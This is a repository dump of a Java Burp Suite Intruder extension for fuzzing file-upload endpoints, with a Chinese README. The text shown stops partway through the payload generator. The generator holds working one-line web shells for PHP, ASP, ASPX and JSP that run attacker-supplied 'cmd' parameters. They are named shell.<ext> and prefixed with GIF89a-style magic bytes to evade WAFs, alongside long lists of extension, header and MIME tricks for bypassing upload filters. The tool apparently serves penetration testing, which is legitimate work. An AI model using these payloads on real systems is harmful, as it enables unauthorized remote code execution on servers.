├── .idea
    ├── .gitignore
    ├── compiler.xml
    ├── encodings.xml
    ├── jarRepositories.xml
    ├── misc.xml
    └── uiDesigner.xml
├── README.md
├── pom.xml
└── src
    └── main
        └── java
            ├── BurpUploadMain.java
            ├── PayloadGenerator.java
            └── UploadFuzzer.java


/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | 


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="UploadBurpFuzz" />
10 |       </profile>
11 |     </annotationProcessing>
12 |   </component>
13 | </project>


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="Encoding">
4 |     <file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
5 |     <file url="file://$PROJECT_DIR$/src/main/resources" charset="UTF-8" />
6 |   </component>
7 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Central Repository" />
 7 |       <option name="url" value="http://maven.aliyun.com/nexus/content/groups/public/" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="central" />
11 |       <option name="name" value="Maven Central repository" />
12 |       <option name="url" value="https://repo1.maven.org/maven2" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="jboss.community" />
16 |       <option name="name" value="JBoss Community repository" />
17 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ASMSmaliIdeaPluginConfiguration">
 4 |     <asm skipDebug="true" skipFrames="true" skipCode="false" expandFrames="false" />
 5 |     <groovy codeStyle="LEGACY" />
 6 |   </component>
 7 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 8 |   <component name="MavenProjectsManager">
 9 |     <option name="originalFiles">
10 |       <list>
11 |         <option value="$PROJECT_DIR$/pom.xml" />
12 |       </list>
13 |     </option>
14 |   </component>
15 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_17" default="true" project-jdk-name="17" project-jdk-type="JavaSDK">
16 |     <output url="file://$PROJECT_DIR$/out" />
17 |   </component>
18 | </project>


--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <project version="4">
  3 |   <component name="Palette2">
  4 |     <group name="Swing">
  5 |       <item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
  6 |         <default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
  7 |       </item>
  8 |       <item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
  9 |         <default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
 10 |       </item>
 11 |       <item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 12 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
 13 |       </item>
 14 |       <item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.svg" removable="false" auto-create-binding="false" can-attach-label="true">
 15 |         <default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
 16 |       </item>
 17 |       <item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 18 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
 19 |         <initial-values>
 20 |           <property name="text" value="Button" />
 21 |         </initial-values>
 22 |       </item>
 23 |       <item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 24 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 25 |         <initial-values>
 26 |           <property name="text" value="RadioButton" />
 27 |         </initial-values>
 28 |       </item>
 29 |       <item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 30 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 31 |         <initial-values>
 32 |           <property name="text" value="CheckBox" />
 33 |         </initial-values>
 34 |       </item>
 35 |       <item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 36 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
 37 |         <initial-values>
 38 |           <property name="text" value="Label" />
 39 |         </initial-values>
 40 |       </item>
 41 |       <item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 42 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 43 |           <preferred-size width="150" height="-1" />
 44 |         </default-constraints>
 45 |       </item>
 46 |       <item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 47 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 48 |           <preferred-size width="150" height="-1" />
 49 |         </default-constraints>
 50 |       </item>
 51 |       <item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 52 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 53 |           <preferred-size width="150" height="-1" />
 54 |         </default-constraints>
 55 |       </item>
 56 |       <item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 57 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 58 |           <preferred-size width="150" height="50" />
 59 |         </default-constraints>
 60 |       </item>
 61 |       <item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 62 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 63 |           <preferred-size width="150" height="50" />
 64 |         </default-constraints>
 65 |       </item>
 66 |       <item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 67 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 68 |           <preferred-size width="150" height="50" />
 69 |         </default-constraints>
 70 |       </item>
 71 |       <item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 72 |         <default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
 73 |       </item>
 74 |       <item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 75 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 76 |           <preferred-size width="150" height="50" />
 77 |         </default-constraints>
 78 |       </item>
 79 |       <item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 80 |         <default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
 81 |           <preferred-size width="150" height="50" />
 82 |         </default-constraints>
 83 |       </item>
 84 |       <item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 85 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 86 |           <preferred-size width="150" height="50" />
 87 |         </default-constraints>
 88 |       </item>
 89 |       <item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 90 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 91 |           <preferred-size width="200" height="200" />
 92 |         </default-constraints>
 93 |       </item>
 94 |       <item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 95 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 96 |           <preferred-size width="200" height="200" />
 97 |         </default-constraints>
 98 |       </item>
 99 |       <item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.svg" removable="false" auto-create-binding="true" can-attach-label="true">
100 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
101 |       </item>
102 |       <item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.svg" removable="false" auto-create-binding="true" can-attach-label="false">
103 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
104 |       </item>
105 |       <item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
106 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
107 |       </item>
108 |       <item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
109 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
110 |       </item>
111 |       <item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.svg" removable="false" auto-create-binding="false" can-attach-label="false">
112 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
113 |           <preferred-size width="-1" height="20" />
114 |         </default-constraints>
115 |       </item>
116 |       <item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
117 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
118 |       </item>
119 |       <item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
120 |         <default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
121 |       </item>
122 |     </group>
123 |   </component>
124 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # UploadFuzzBurp
 2 | 
 3 | # 简介
 4 |   根据T3nk0的进行编写java版本的burp文件上传fuzz，优化了一些逻辑、以及一些绕过的功能点，感谢T3nk0的开源精神，以前也想写这种upload fuzz的工具，但是上传包多样就没有搞了，没想到还有这种方法，学习到了。
 5 | 
 6 | # 本人环境参考
 7 | > burp环境burpsuite 2025.2
 8 | >
 9 | > 工具环境：
10 | >   java17编写
11 | >   java17编译
12 | 
13 | # 功能介绍
14 | <img width="896" alt="1743504399847" src="https://github.com/user-attachments/assets/a58be390-bb94-45f9-83aa-427019b99a27" />
15 |  
16 |   1. 后缀绕过
17 |      
18 |   2. 编码解码
19 | 
20 |   3. 协议绕过
21 |      
22 |   4. .......
23 | 
24 | # 使用方法
25 | 1.成功加载该插件
26 | 
27 | 2.将需要fuzz的包，传送到Intruder中
28 | 
29 | 3.设置这种部位为payload地址
30 | 
31 | <img width="993" alt="d7ddb43e46fa0a43360b7acd9741c31" src="https://github.com/user-attachments/assets/96c353f2-7e31-479e-aacc-40160ea18184" />
32 | 
33 | 4.然后设置如下内容
34 | 
35 | <img width="962" alt="5bb289c7ea7184f13ce952090852061" src="https://github.com/user-attachments/assets/c7ff7855-ea31-4722-a64e-034760099bb2" />
36 | 
37 | # 参考项目
38 | > https://github.com/T3nk0/Upload_Auto_Fuzz
39 | >
40 | > 以及一些文章，数量较多就不书列了。
41 | 


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>UploadBurpFuzz</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>17</maven.compiler.source>
13 |         <maven.compiler.target>17</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>net.portswigger.burp.extender</groupId>
19 |             <artifactId>burp-extender-api</artifactId>
20 |             <version>1.7.22</version>
21 |         </dependency>
22 |     </dependencies>
23 |     <build>
24 |         <plugins>
25 |             <plugin>
26 |                 <groupId>org.apache.maven.plugins</groupId>
27 |                 <artifactId>maven-assembly-plugin</artifactId>
28 |                 <executions>
29 |                     <execution>
30 |                         <phase>package</phase>
31 |                         <goals>
32 |                             <goal>single</goal>
33 |                         </goals>
34 |                     </execution>
35 |                 </executions>
36 |                 <configuration>
37 |                     <descriptorRefs>
38 |                         <descriptorRef>jar-with-dependencies</descriptorRef>
39 |                     </descriptorRefs>
40 |                 </configuration>
41 |             </plugin>
42 |         </plugins>
43 |     </build>
44 | </project>


--------------------------------------------------------------------------------
/src/main/java/BurpUploadMain.java:
--------------------------------------------------------------------------------
 1 | import burp.*;
 2 | 
 3 | public class BurpUploadMain implements IBurpExtender, IIntruderPayloadGeneratorFactory {
 4 |     private IExtensionHelpers helpers;
 5 |     private IBurpExtenderCallbacks callbacks;
 6 | 
 7 |     @Override
 8 |     public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
 9 |         this.callbacks = callbacks;
10 |         this.helpers = callbacks.getHelpers();
11 |         callbacks.setExtensionName("Upload Auto Fuzz");
12 | 
13 |         callbacks.registerIntruderPayloadGeneratorFactory(this);
14 | 
15 |         callbacks.printOutput("loaded successfully - Author: e0e1 - Version: 1.0\ngithub: https://github.com/eeeeeeeeee-code/UploadFuzzBurp");
16 |     }
17 | 
18 |     @Override
19 |     public String getGeneratorName() {
20 |         return "Upload Auto Fuzz";
21 |     }
22 | 
23 |     @Override
24 |     public IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack) {
25 |         return new UploadFuzzer(this.helpers, attack, this.callbacks);
26 |     }
27 | }


--------------------------------------------------------------------------------
/src/main/java/PayloadGenerator.java:
--------------------------------------------------------------------------------
  1 | import java.util.ArrayList;
  2 | import java.util.Arrays;
  3 | import java.util.HashSet;
  4 | import java.util.List;
  5 | import java.util.Set;
  6 | import java.util.regex.Matcher;
  7 | import java.util.regex.Pattern;
  8 | import java.util.Base64;
  9 | 
 10 | public class PayloadGenerator {
 11 | 
 12 |     public static List<String> getAttackPayloads(String template) {
 13 |         
 14 |         Pattern pattern = Pattern.compile("filename=\".*[.](.*?)\"");
 15 |         Matcher matcher = pattern.matcher(template);
 16 |         String filenameSuffix = "";
 17 |         if (matcher.find()) {
 18 |             filenameSuffix = matcher.group(1);  
 19 |         }
 20 | 
 21 |         String contentType = template.split("\n")[template.split("\n").length - 1];
 22 | 
 23 |         List<String> allPayloads = new ArrayList<>();
 24 | 
 25 |         
 26 |         allPayloads.addAll(scriptSuffixFuzz(template, filenameSuffix));
 27 |         allPayloads.addAll(cffFuzz(template, filenameSuffix));
 28 |         allPayloads.addAll(contentTypeFuzz(template, filenameSuffix, contentType));
 29 |         allPayloads.addAll(windowsFeaturesFuzz(template, filenameSuffix));
 30 |         allPayloads.addAll(linuxFeaturesFuzz(template, filenameSuffix));
 31 |         allPayloads.addAll(magicBytesFuzz(template, filenameSuffix));
 32 |         allPayloads.addAll(fileContentTrickFuzz(template, filenameSuffix));
 33 |         allPayloads.addAll(userIniFuzz(template, filenameSuffix));
 34 |         allPayloads.addAll(mimeEncodingFuzz(template, filenameSuffix));
 35 |         allPayloads.addAll(httpProtocolSplitFuzz(template, filenameSuffix));
 36 |         allPayloads.addAll(chunkedEncodingFuzz(template, filenameSuffix));
 37 |         allPayloads.addAll(wafBypassFuzz(template, filenameSuffix));
 38 |         allPayloads.addAll(unicodeNormalizationFuzz(template, filenameSuffix));
 39 |         allPayloads.addAll(httpHeaderSmugglingFuzz(template, filenameSuffix));
 40 |         allPayloads.addAll(nullByteVariationsFuzz(template, filenameSuffix));
 41 |         allPayloads.addAll(protocolHandlerFuzz(template, filenameSuffix));
 42 |         allPayloads.addAll(svgXssFuzz(template, filenameSuffix));
 43 |         allPayloads.addAll(webdavMethodFuzz(template, filenameSuffix));
 44 |         allPayloads.addAll(fileContentBypassFuzz(template, filenameSuffix));
 45 | 
 46 |         
 47 |         return removeDuplicates(allPayloads);
 48 |     }
 49 | 
 50 |     public static List<String> getFuzzPayloadsForFullSection(String selectedArea) {
 51 |         List<String> fullSectionPayloads = new ArrayList<>();
 52 | 
 53 |         
 54 |         Pattern filenamePattern = Pattern.compile("filename=\"([^\"]*)\"");
 55 |         Matcher filenameMatcher = filenamePattern.matcher(selectedArea);
 56 | 
 57 |         Pattern contentPartPattern = Pattern.compile("Content-Type:.*?\\r\\n\\r\\n(.*?)$", Pattern.DOTALL);
 58 |         Matcher contentPartMatcher = contentPartPattern.matcher(selectedArea);
 59 | 
 60 |         if (!filenameMatcher.find() || !contentPartMatcher.find()) {
 61 |             
 62 |             fullSectionPayloads.add(selectedArea);
 63 |             return fullSectionPayloads;
 64 |         }
 65 | 
 66 |         String originalFilename = filenameMatcher.group(1);
 67 |         String originalContent = contentPartMatcher.group(1);
 68 | 
 69 |         
 70 |         String filenameSuffix = "";
 71 |         if (originalFilename.contains(".")) {
 72 |             filenameSuffix = originalFilename.substring(originalFilename.lastIndexOf('.') + 1);
 73 | 
 74 |         }
 75 | 
 76 |         
 77 |         List<String> phpContents = Arrays.asList(
 78 |                 "<?php eval($_POST[\"cmd\"]); ?>",
 79 |                 "<?php system($_REQUEST[\"cmd\"]); ?>"
 80 |         );
 81 | 
 82 |         List<String> aspContents = Arrays.asList(
 83 |                 "<%eval request(\"cmd\")%>",
 84 |                 "<%execute request(\"cmd\")%>"
 85 |         );
 86 | 
 87 |         List<String> aspxContents = Arrays.asList(
 88 |                 "<%@ Page Language=\"C#\" %><%System.Diagnostics.Process.Start(\"cmd.exe\",\"/c \"+Request[\"cmd\"]);%>",
 89 |                 "<%@ Page Language=\"C#\" %><%eval(Request.Item[\"cmd\"]);%>"
 90 |         );
 91 | 
 92 |         List<String> jspContents = Arrays.asList(
 93 |                 "<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>",
 94 |                 "<%=Runtime.getRuntime().exec(request.getParameter(\"cmd\"))%>"
 95 |         );
 96 | 
 97 |         
 98 |         List<String> wafBypassPrefixes = Arrays.asList(
 99 |                 "GIF89a;\n",
100 |                 "#!MIME type image/gif\n",
101 |                 "<!--\n",
102 |                 "%PDF-1.5\n"
103 |         );
104 | 
105 |         
106 |         for (String ext : Arrays.asList("php", "asp", "aspx", "jsp")) {
107 |             
108 |             String newArea = selectedArea.replace("filename=\"" + originalFilename + "\"",
109 |                     "filename=\"shell." + ext + "\"");
110 | 
111 |             
112 |             List<String> contents = new ArrayList<>();
113 |             if (ext.equals("php")) {
114 |                 contents = phpContents;
115 |             } else if (ext.equals("asp")) {
116 |                 contents = aspContents;
117 |             } else if (ext.equals("aspx")) {
118 |                 contents = aspxContents;
119 |             } else if (ext.equals("jsp")) {
120 |                 contents = jspContents;
121 |             }
122 | 
123 |             
124 |             int count = 0;
125 |             for (String content : contents) {
126 |                 if (count >= 2) break;
127 | 
128 |                 
129 |                 if (originalContent != null && !originalContent.isEmpty()) {
130 |                     String newAreaWithContent = newArea.replaceAll(
131 |                             "Content-Type:.*?\\r\\n\\r\\n.*?$",
132 |                             "Content-Type: text/plain\\r\\n\\r\\n" + content
133 |                     );
134 |                     fullSectionPayloads.add(newAreaWithContent);
135 | 
136 |                     
137 |                     for (String prefix : wafBypassPrefixes) {
138 |                         String newAreaWithPrefix = newArea.replaceAll(
139 |                                 "Content-Type:.*?\\r\\n\\r\\n.*?$",
140 |                                 "Content-Type: text/plain\\r\\n\\r\\n" + prefix + content
141 |                         );
142 |                         fullSectionPayloads.add(newAreaWithPrefix);
143 |                     }
144 |                 }
145 |                 count++;
146 |             }
147 |         }
148 | 
149 |         
150 |         return removeDuplicates(fullSectionPayloads);
151 |     }
152 | 
153 |     private static List<String> scriptSuffixFuzz(String template, String filenameSuffix) {
154 |         List<String> suffixPayload = new ArrayList<>();
155 | 
156 |         List<String> aspxFuzz = Arrays.asList("asPx", "aspx .jpg", "aspx_.jpg", "aspx;+2.jpg", "asaspxpx");
157 | 
158 |         List<String> jspFuzz = Arrays.asList(".jsp.jpg.jsp", "jspa", "jsps", "jspx", "jspf", "jsp .jpg", "jsp_.jpg");
159 | 
160 |         List<String> mergedAspFuzz = Arrays.asList(
161 |                 "asp;.jpg", "asp.jpg", "asp;jpg", "asp/1.jpg", "asp%00.jpg", "asp .jpg",
162 |                 "asp_.jpg", "asa", "cer", "cdx", "ashx", "asmx", "xml", "htr", "asax", "asaspp", "asp;+2.jpg",
163 |                 "asp.", "asp;", "asp,", "asp:", "asp%20", "asp%00", "asp%0a", "asp%0d%0a",
164 |                 "asp%0d", "asp%0a%0d", "asp%09", "asp%0b", "asp%0c", "asp%0e", "asp%0f","asp\\x00",
165 |                 "asp.jpg.asp", "asp.jpg.asp.jpg", "asp.asp.jpg", "asp.jpg.123",
166 |                 "asp.jpg...", "asp.jpg/", "asp.jpg\\", "asp.jpg::$DATA"
167 |         );
168 | 
169 | 
170 |         List<String> mergedPhpFuzz = Arrays.asList(
171 |                 "php1", "php2", "php3", "php4", "php5", "pHp", "php .jpg", "php_.jpg", "php.jpg", "php.  .jpg",
172 |                 "jpg/.php", "php.123", "jpg/php", "jpg/1.php", "jpg%00.php", "php%00.jpg", "php:1.jpg", "pHP.....",
173 |                 "php::$DATA", "php::$DATA......", "ph\np",
174 |                 "php.", "php;", "php,", "php:", "php%20", "php%00","php%0a", "phtml", "pht", "phpt", "php#.png", "php\\x00.png",
175 |                 "php7", "php8", "phar", "pgif", "php.jpg.php", "php.jpg.php.jpg",
176 |                 "php.php.jpg", "php.jpg.123", "php.jpg...", "php.jpg/", "php.jpg\\"
177 |         );
178 | 
179 |         
180 |         List<String> suffixFuzz = new ArrayList<>();
181 |         suffixFuzz.addAll(aspxFuzz);
182 |         suffixFuzz.addAll(jspFuzz);
183 |         suffixFuzz.addAll(mergedAspFuzz);
184 |         suffixFuzz.addAll(mergedPhpFuzz);
185 | 
186 |         for (String eachSuffix : suffixFuzz) {
187 |             
188 |             String tempTemplate = template;
189 |             String temp = tempTemplate.replace(filenameSuffix, eachSuffix);
190 |             suffixPayload.add(temp);
191 |         }
192 | 
193 |         return suffixPayload;
194 |     }
195 | 
196 |     private static List<String> cffFuzz(String template, String filenameSuffix) {
197 |         
198 |         List<String> contentDispositionPayload = new ArrayList<>();
199 | 
200 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp", "asmx", "xml", "html", "shtml", "svg", "swf", "htaccess");
201 | 
202 |         for (String eachSuffix : suffix) {
203 |             
204 |             String tempTemplate = template;
205 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
206 | 
207 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
208 |             Matcher matcher = pattern.matcher(tempTemplateSuffix);
209 |             String filenameTotal = "";
210 |             if (matcher.find()) {
211 |                 filenameTotal = matcher.group(1);
212 |             }
213 | 
214 |             String tempTempTemplateSuffix = tempTemplateSuffix;
215 |             contentDispositionPayload.add(tempTempTemplateSuffix);
216 | 
217 |             tempTempTemplateSuffix = tempTemplateSuffix;
218 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("Content-Disposition", "content-Disposition"));
219 | 
220 |             tempTempTemplateSuffix = tempTemplateSuffix;
221 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("Content-Disposition: ", "content-Disposition:"));
222 | 
223 |             tempTempTemplateSuffix = tempTemplateSuffix;
224 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("Content-Disposition: ", "content-Disposition:  "));
225 | 
226 |             tempTempTemplateSuffix = tempTemplateSuffix;
227 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data", "~form-data"));
228 | 
229 |             tempTempTemplateSuffix = tempTemplateSuffix;
230 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data", "f+orm-data"));
231 | 
232 |             tempTempTemplateSuffix = tempTemplateSuffix;
233 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data", "*"));
234 | 
235 |             tempTempTemplateSuffix = tempTemplateSuffix;
236 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data; ", "form-data;  "));
237 | 
238 |             tempTempTemplateSuffix = tempTemplateSuffix;
239 |             contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data; ", "form-data;"));
240 | 
241 |             if (!filenameTotal.isEmpty()) {
242 |                 tempTempTemplateSuffix = tempTemplateSuffix;
243 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename===zc." + eachSuffix));
244 | 
245 |                 tempTempTemplateSuffix = tempTemplateSuffix;
246 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename===\\\"zc." + eachSuffix));
247 | 
248 |                 tempTempTemplateSuffix = tempTemplateSuffix;
249 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename===\\\"zc." + eachSuffix + "\\\""));
250 | 
251 |                 tempTempTemplateSuffix = tempTemplateSuffix;
252 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc." + eachSuffix + "\n\\\""));
253 | 
254 |                 tempTempTemplateSuffix = tempTemplateSuffix;
255 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "\nfilename===\\\"zc.\n" + eachSuffix + "\\\""));
256 | 
257 |                 tempTempTemplateSuffix = tempTemplateSuffix;
258 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc.\nC." + eachSuffix + "\\\""));
259 | 
260 |                 tempTempTemplateSuffix = tempTemplateSuffix;
261 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename\n=\\\"zc." + eachSuffix + "\\\""));
262 | 
263 |                 tempTempTemplateSuffix = tempTemplateSuffix;
264 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc\\." + eachSuffix + "\\\""));
265 | 
266 |                 tempTempTemplateSuffix = tempTemplateSuffix;
267 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename===zczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczc." + eachSuffix));
268 | 
269 |                 tempTempTemplateSuffix = tempTemplateSuffix;
270 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace("form-data", "form-data------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------"));
271 | 
272 |                 tempTempTemplateSuffix = tempTemplateSuffix;
273 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc.jpg\\\";filename=\\\"zc." + eachSuffix + "\\\""));
274 | 
275 |                 
276 |                 tempTempTemplateSuffix = tempTemplateSuffix;
277 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc." + eachSuffix + ".jpg\\\""));
278 | 
279 |                 tempTempTemplateSuffix = tempTemplateSuffix;
280 |                 contentDispositionPayload.add(tempTempTemplateSuffix.replace(filenameTotal, "filename=\\\"zc.jpg." + eachSuffix + "\\\""));
281 |             }
282 |         }
283 | 
284 |         return contentDispositionPayload;
285 |     }
286 | 
287 |     private static List<String> contentTypeFuzz(String template, String filenameSuffix, String contentType) {
288 |         List<String> contentTypePayload = new ArrayList<>();
289 |         List<String> suffix = Arrays.asList("asp", "aspx", "php", "jsp");
290 | 
291 |         for (String eachSuffix : suffix) {
292 |             String tempTemplate = template;
293 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
294 | 
295 |             String tempTemplateContentType = tempTemplateSuffix;
296 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: image/gif"));
297 | 
